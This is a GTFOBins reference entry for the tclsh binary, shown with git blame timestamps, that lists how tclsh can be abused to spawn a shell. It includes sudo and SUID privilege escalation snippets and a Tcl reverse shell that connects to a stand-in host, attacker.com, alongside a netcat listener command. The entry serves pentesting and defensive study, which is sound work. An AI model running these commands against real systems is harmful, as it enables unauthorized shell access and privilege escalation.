GTFOBins.github.io/_gtfobins/tclsh.md

21 lines
710 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
exec-interactive:
- code: |
tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
sudo-enabled:
- code: |
sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
suid-enabled:
- code: |
./tclsh
exec /bin/sh -p <@stdin >@stdout 2>@stderr
reverse-shell-non-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
2018-05-22 23:04:46 +02:00
code: |
2018-05-24 21:59:21 +02:00
export RHOST=attacker.com
2018-05-23 09:08:13 +02:00
export RPORT=12345
2018-05-22 23:04:46 +02:00
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
2018-05-21 21:14:41 +02:00
---